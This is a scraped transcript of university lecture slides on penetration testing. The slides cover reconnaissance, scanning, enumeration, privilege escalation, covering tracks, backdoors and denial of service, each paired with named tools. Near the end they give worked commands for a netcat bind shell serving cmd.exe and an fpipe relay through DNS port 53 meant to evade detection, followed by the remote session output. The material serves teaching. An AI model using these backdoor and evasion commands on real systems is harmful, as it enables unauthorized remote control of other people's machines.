Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 cs691 chow C. Edward Chow Penetrate Testing. 2 cs691 chow Outline of The Talk Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "1 cs691 chow C. Edward Chow Penetrate Testing. 2 cs691 chow Outline of The Talk Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack."— Presentation transcript:

1 1 cs691 chow C. Edward Chow Penetrate Testing

2 2 cs691 chow Outline of The Talk Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack Framework for penetration studies Skills and Requirements of a Penetration Tester SAN list of Security Holes Internet Penetration Dial up Penetration Internal Penetration References: Chapter 23 Vulnerability Analysis, by Matt Bishop. Hack I.T, Security Through Penetration Testing, by T.J. Klevinksy, Scott Laliberte, Ajay Gupta. Hacking Exposed, by Stuart McClure, Joel Scambray and George Kurtz http://www.hackingexposed.com/win2k/links.html Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack Framework for penetration studies Skills and Requirements of a Penetration Tester SAN list of Security Holes Internet Penetration Dial up Penetration Internal Penetration References: Chapter 23 Vulnerability Analysis, by Matt Bishop. Hack I.T, Security Through Penetration Testing, by T.J. Klevinksy, Scott Laliberte, Ajay Gupta. Hacking Exposed, by Stuart McClure, Joel Scambray and George Kurtz http://www.hackingexposed.com/win2k/links.html

3 3 cs691 chow Definition Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management. Using the failure of the system to violate the site security policy is called exploiting the vulnerability Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them. Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy. Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system. It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence. Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects. What is the difference between penetration testing and hacking/intrusion? Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management. Using the failure of the system to violate the site security policy is called exploiting the vulnerability Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them. Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy. Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system. It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence. Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects. What is the difference between penetration testing and hacking/intrusion?

4 4 cs691 chow More Thorough Penetration Study A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implemenation. A simple list of vulnerabilities, although helpful in closing those specific holes, contribute far less to the security of a system. In practice, constrains (resource, money, time) affect the penetration study A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implemenation. A simple list of vulnerabilities, although helpful in closing those specific holes, contribute far less to the security of a system. In practice, constrains (resource, money, time) affect the penetration study

5 5 cs691 chow Hacking Methodology (Steps) An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al. Scanning Footprinting Enumeration Gaining Access Escalating Privilege Pilferting Covering Tracks Creating Back Doors Denial of Service whois, nslookup Nmap, fping dumpACL, showmount legion, rpcinfo Tcpdump, Lophtcrack NAT Johntheripper, getadmin Rhosts, userdata Config files, registry zap, rootkits Cron,at, startup folder netcat, keystroke logger remote desktop Synk4, ping of death tfn/stacheldraht

6 6 cs691 chow Footprinting Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of). Defense: deploy NIDS (snort), RotoRouter Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of). Defense: deploy NIDS (snort), RotoRouter TechniquesOpen Source search Find domain name, admin, IP addresses name servers DNS zone transfer ToolsGoogleGoogle, search engine, EdgarEdgar Whois (Network solution; arin)Network solution arin Nslookup (ls –d) Nslookup (ls –d) dig Sam Spade Sam Spade

7 7 cs691 chow Scanning Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence. Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example. Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence. Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example. TechniquesPing sweepTCP/UDP port scan OS detection ToolsFpingFping, icmpenum WS_Ping ProPack nmap Nmap Nmap Superscan fscan Nmap Nmap queso siphon

8 8 cs691 chow Enumeration Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step. Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step. Techniqueslist user accounts list file sharesidentify applications ToolsNull sessions DumpACL Sid2usre onSiteAdmin Showmount NAT legion Banner grabing with telnet or netcat, rpcinfo netcat

9 9 cs691 chow Gaining Access Based on the information gathered so far, make an informed attempted to access the target. Techniq ues Password eavesdropping File share brute forcing Password File grab Buffer overflow ToolsTcpdump/ssldu mp L0phtcrack readsmb NAT legion Tftp Pwddump2(NT) Ttdb, bind IIS.HTR/ISM. DLL

10 10 cs691 chow Escalating Privilege If only user-level access was obtained in the last step, seek to gain complete control of the system. TechniquesPassword crackingKnown Exploits ToolsJohn the ripper L0phtcrack Lc_messages, Getadmin, sechole

11 11 cs691 chow Pilfering Webster's Revised Unabridged Dictionary (1913) Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.PilferedPelf Gather info on identify mechanisms to allow access of trusted systems. Webster's Revised Unabridged Dictionary (1913) Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.PilferedPelf Gather info on identify mechanisms to allow access of trusted systems. TechniquesEvaluate TrustsSearch for cleartext passwords Toolsrhosts LSA secrets User data, Configuration files Registry

12 12 cs691 chow Covering Tracks Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp. TechniquesClear LogsHide tools ToolsZap, Event Log GUIRootkits file streaming

13 13 cs691 chow Creating Back Doors Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides. TechniquesCreate rogue user accounts Schedule batch jobs Infect startup files ToolsMembers of wheel, admin Cron, ATrc, startup folder, registry keys TechniquesPlant remote control services Install monitoring mechanisms Replace appls with Trojans ToolsNetcat, remote.exe VNC, B02K remote desktop Keystroke loggers, add acct. to secadmin mail aliases Login, fpnwcint.dll

14 14 cs691 chow Denial of Services If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort. TechniquesSyn floodICMP techniquesIdentical src/dst SYN requests Toolssynk4Ping to death smurf Land Latierra TechniquesOverlapping fragment/offset bugs Out of bounds TCP options (OOB) DDoS ToolsNetcat, remote.exe VNC, B02K remote desktop Keystroke loggers, add acct. to secadmin mail aliases Trinoo TFN stacheldraht

15 15 cs691 chow Nessus: Integrated Security Scanning Tool Originally designed by Renaud DeraisonRenaud Deraison Available at www.nessus.orgwww.nessus.org Main scanning engine running on Unix server with client GUI running on Unix or Windows. Pretty good control and reporting. Include a script language for plug-in (detecting additional attacks). http://www.nessus.org/pres/bh2001/index.html Originally designed by Renaud DeraisonRenaud Deraison Available at www.nessus.orgwww.nessus.org Main scanning engine running on Unix server with client GUI running on Unix or Windows. Pretty good control and reporting. Include a script language for plug-in (detecting additional attacks). http://www.nessus.org/pres/bh2001/index.html

16 16 cs691 chow

17 17 cs691 chow

18 18 cs691 chow

19 19 cs691 chow

20 20 cs691 chow

21 21 cs691 chow

22 22 cs691 chow Setting up Backdoor Connection Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe) Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall. We will use netcat and fpipe to illustrate the concept. Netcat is available at http://www.atstake.com/research/tools/network_utilities/ Fpipe is available at http://www.foundstone.comhttp://www.foundstone.com Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe) Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall. We will use netcat and fpipe to illustrate the concept. Netcat is available at http://www.atstake.com/research/tools/network_utilities/ Fpipe is available at http://www.foundstone.comhttp://www.foundstone.com

23 23 cs691 chow Setup Netcat C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63 listening on [128.198.177.63] 80... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on [128.198.177.63] 80... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu Here we bind in front of port 80. You can also use port 139. The idea is used known port to avoid detection. -L is used to repeat previous command after connection is terminated. The nc command will receive command from packet to port 80, and run it with cmd.exe and send back execution result. C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63 listening on [128.198.177.63] 80... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on [128.198.177.63] 80... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu Here we bind in front of port 80. You can also use port 139. The idea is used known port to avoid detection. -L is used to repeat previous command after connection is terminated. The nc command will receive command from packet to port 80, and run it with cmd.exe and send back execution result.

24 24 cs691 chow Setup FPIPE C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63 FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com Pipe connected: In: 128.198.162.60:58797 --> 128.198.177.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.177.63:53 Out: 128.198.177.63:53 --> 128.198.177.63:80 Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection. C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63 FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com Pipe connected: In: 128.198.162.60:58797 --> 128.198.177.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.177.63:53 Out: 128.198.177.63:53 --> 128.198.177.63:80 Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection.

25 25 cs691 chow Telnet to the relay host C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00 Directory of C:\work\cucs\cs522\project 04/29/2003 12:56 PM. 04/29/2003 12:56 PM.. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps 04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00 Directory of C:\work\cucs\cs522\project 04/29/2003 12:56 PM. 04/29/2003 12:56 PM.. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps 04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf

26 26 cs691 chow Layering of Tests 1. External attacker with no knowledge of the system. 2. External attacker with access to the system. 3. Internal attacker with access to the system. 1. External attacker with no knowledge of the system. 2. External attacker with access to the system. 3. Internal attacker with access to the system.

27 27 cs691 chow

Download ppt "1 cs691 chow C. Edward Chow Penetrate Testing. 2 cs691 chow Outline of The Talk Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack."

Similar presentations

Expose the Vulnerability Paul Hogan Ward Solutions.

Expose the Vulnerability Paul Hogan Ward Solutions.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Penetration Testing & Countermeasures Paul Fong & Cai Yu CS691 5 May 2003.

Penetration Testing & Countermeasures Paul Fong & Cai Yu CS691 5 May 2003.
1 Reading Log Files. 2 Segment Format

1 Reading Log Files. 2 Segment Format
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Information Networking Security and Assurance Lab National Chung Cheng University Network Security (I) 授課老師 : 鄭伯炤 Office: Dept. of Communication Rm #112.

Information Networking Security and Assurance Lab National Chung Cheng University Network Security (I) 授課老師 : 鄭伯炤 Office: Dept. of Communication Rm #112.
Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.

Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.
Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.

Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.
INDEX  Ethical Hacking Terminology.  What is Ethical hacking?  Who are Ethical hacker?  How many types of hackers?  White Hats (Ethical hackers)

INDEX  Ethical Hacking Terminology.  What is Ethical hacking?  Who are Ethical hacker?  How many types of hackers?  White Hats (Ethical hackers)
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost 127.0.0.1 (loopback address)  Internal networks 

Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost (loopback address)  Internal networks 
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.

Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Penetration Testing.

Penetration Testing.
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.

Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.

Similar presentations

Ads by Google